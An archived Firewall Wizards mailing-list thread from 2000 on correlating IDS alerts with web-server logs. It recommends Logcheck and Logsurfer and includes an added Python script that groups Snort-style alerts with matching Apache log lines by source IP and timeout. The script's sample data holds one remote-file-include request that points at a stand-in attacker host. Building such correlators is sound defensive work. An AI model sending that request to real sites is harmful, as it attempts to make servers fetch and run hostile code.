Firewall Wizards mailing list archives
Re: Tools to correlate attacks b/w diff. logs
From: Rafi Sadowsky <rafi () meron openu ac il>
Date: Fri, 14 Jan 2000 10:12:49 +0200 (IST)
Logcheck will tail multiple logfiles with some pattern matching
<ftp://ftp.cert.dfn.de/pub/tools/audit/logcheck/logcheck-1.01.tar.gz>

Logsurfer - will only do one file at a time but with multiple contexts (a context can be opened on a regexp match & continue collecting lines until a timeout, or report line X only if line Y doesn't get logged within a timeout)
<http://www.cert.dfn.de/eng/logsurf/>

--
Rafi Sadowsky                  rafi () oumail openu ac il
Network/System/Security        VoiceMail: +972-3-646-0592  FAX: +972-3-646-5410
Mangler ( :-)                  | member ILAN-CERT (CERT () CERT AC IL)
Open University of Israel      | (PGP key -> ) http://telem.openu.ac.il/~rafi

On Tue, 11 Jan 2000, Pete Storm wrote:
Hi all,

Does anyone know of a tool out there that will allow me to correlate incidents between several different logs? For example, if I see an attempt to pull off a php exploit on my IDS it stands to reason that I'll see a similar log entry on my web server. What I'm looking for is something that will pull these two records out of the individual logs and place them in an "incident" log as a related event. The current problem is that we're talking about hundreds of thousands of log entries. Suppose I could Perl it, but I was kinda hoping there might be a commercial/shareware tool out there already that could do it so much better than I could.

thanks,
phs

__________________________________________________
Do You Yahoo!?
Talk to your friends online with Yahoo! Messenger.
http://im.yahoo.com
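The Logsurfer-style contexts Rafi describes (open a context on a regexp match, collect related lines until a timeout, report line X only if line Y never shows up) applied to Pete's IDS-versus-web-server case, as an added example in Python. This is not code from Logsurfer, Logcheck or either poster; the two log formats (Snort-style fast alerts and Apache combined access log), the 30-second window, the year used for the IDS timestamps and every log line below are assumptions and constructed sample data, not real traffic.

```python
"""Cross-log correlation of IDS alerts with web-server requests.

Added example: merges events from two differently formatted logs into one
time-ordered stream, then applies two Logsurfer-style rules:
  1. an IDS alert opens a "context" keyed by source IP; web-server lines
     from that IP are collected into it until a timeout expires;
  2. if the context expires without collecting anything, the alert is
     reported on its own (the "line X without line Y" rule).
Log formats are assumed (Snort-style fast alerts, Apache combined log) and
all sample lines are constructed.
"""
import re
from datetime import datetime, timedelta

# Constructed sample data (RFC 5737 documentation addresses, not real traffic).
IDS_LOG = """\
01/11-14:02:05.123456  [**] [1:1000:1] WEB-PHP remote file include attempt [**] {TCP} 203.0.113.7:51234 -> 192.0.2.10:80
01/11-14:03:40.000000  [**] [1:1001:1] WEB-PHP phpinfo access [**] {TCP} 198.51.100.9:4444 -> 192.0.2.10:80
"""
WEB_LOG = """\
203.0.113.7 - - [11/Jan/2000:14:02:06 +0000] "GET /index.php?page=http://evil.example/c.txt HTTP/1.0" 200 512 "-" "Mozilla/4.0"
192.0.2.55 - - [11/Jan/2000:14:02:07 +0000] "GET /about.html HTTP/1.0" 200 2048 "-" "Mozilla/4.0"
"""

# Snort fast-alert format carries no year, so the caller supplies one (assumed).
IDS_RE = re.compile(
    r'^(\d\d)/(\d\d)-(\d\d):(\d\d):(\d\d)\.\d+\s+\[\*\*\]\s+\[[\d:]+\]\s+(.+?)\s+\[\*\*\]'
    r'.*?\s(\d+\.\d+\.\d+\.\d+):\d+\s+->\s')
WEB_RE = re.compile(
    r'^(\d+\.\d+\.\d+\.\d+) \S+ \S+ \[(\d\d)/(\w{3})/(\d{4}):(\d\d):(\d\d):(\d\d) [^\]]+\] "(\S+) (\S+)')
MONTHS = {m: i for i, m in enumerate(
    ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'], 1)}


def parse_ids(text, year=2000):
    """Parse Snort-style fast alerts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = IDS_RE.match(line)
        if not m:
            continue
        mon, day, hh, mm, ss, msg, src = m.groups()
        ts = datetime(year, int(mon), int(day), int(hh), int(mm), int(ss))
        events.append({'ts': ts, 'src': src, 'source': 'ids', 'msg': msg, 'raw': line})
    return events


def parse_web(text):
    """Parse Apache combined-format access log lines; non-matching lines are skipped."""
    events = []
    for line in text.splitlines():
        m = WEB_RE.match(line)
        if not m:
            continue
        src, day, mon, year, hh, mm, ss, method, path = m.groups()
        ts = datetime(int(year), MONTHS[mon], int(day), int(hh), int(mm), int(ss))
        events.append({'ts': ts, 'src': src, 'source': 'web',
                       'msg': f'{method} {path}', 'raw': line})
    return events


def correlate(events, timeout=timedelta(seconds=30)):
    """Single pass over the merged, time-sorted stream with per-IP contexts.

    Returns a list of records: kind 'incident' (alert plus the web lines
    collected before the timeout) or 'ids_only' (alert that expired with no
    matching web-server line). Web lines from IPs with no open context are
    ignored, as they would be by a Logsurfer context rule.
    """
    open_ctx = {}   # source IP -> open context
    incidents = []

    def close(ctx):
        kind = 'incident' if ctx['web'] else 'ids_only'
        incidents.append({'kind': kind, 'src': ctx['src'],
                          'alert': ctx['alert'], 'web': ctx['web']})

    for ev in sorted(events, key=lambda e: e['ts']):
        # Expire every context whose timeout passed before this event.
        for src in [s for s, c in open_ctx.items() if ev['ts'] - c['opened'] > timeout]:
            close(open_ctx.pop(src))
        if ev['source'] == 'ids':
            if ev['src'] in open_ctx:          # a new alert supersedes the old context
                close(open_ctx.pop(ev['src']))
            open_ctx[ev['src']] = {'src': ev['src'], 'opened': ev['ts'],
                                   'alert': ev, 'web': []}
        elif ev['src'] in open_ctx:
            open_ctx[ev['src']]['web'].append(ev)
    for ctx in open_ctx.values():              # end of input closes the rest
        close(ctx)
    return incidents


if __name__ == '__main__':
    for rec in correlate(parse_ids(IDS_LOG) + parse_web(WEB_LOG)):
        print(rec['kind'], rec['src'], rec['alert']['msg'], [w['msg'] for w in rec['web']])
```

Two things to check before trusting output like this on hundreds of thousands of lines: the sensor and the web server must agree on time (a web hit logged a few seconds before the alert because of clock skew falls outside a context that only opens on the alert, so a symmetric window needs a small buffer of recent web lines), and lines the regexes silently skip should be counted, otherwise a format change on one host turns every alert into a false "ids_only".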
Current thread:
- Tools to correlate attacks b/w diff. logs Pete Storm (Jan 12)
- Re: Tools to correlate attacks b/w diff. logs R. DuFresne (Jan 13)
- Re: Tools to correlate attacks b/w diff. logs Bryan Swann (Jan 16)
- Re: Tools to correlate attacks b/w diff. logs R. DuFresne (Jan 16)
- Re: Tools to correlate attacks b/w diff. logs Bryan Swann (Jan 16)
- RE: Tools to correlate attacks b/w diff. logs Shaun Moran (Jan 13)
- Re: Tools to correlate attacks b/w diff. logs Rafi Sadowsky (Jan 15)
- <Possible follow-ups>
- RE: Tools to correlate attacks b/w diff. logs Desai, Ashish (Jan 15)
- Re: Tools to correlate attacks b/w diff. logs R. DuFresne (Jan 13)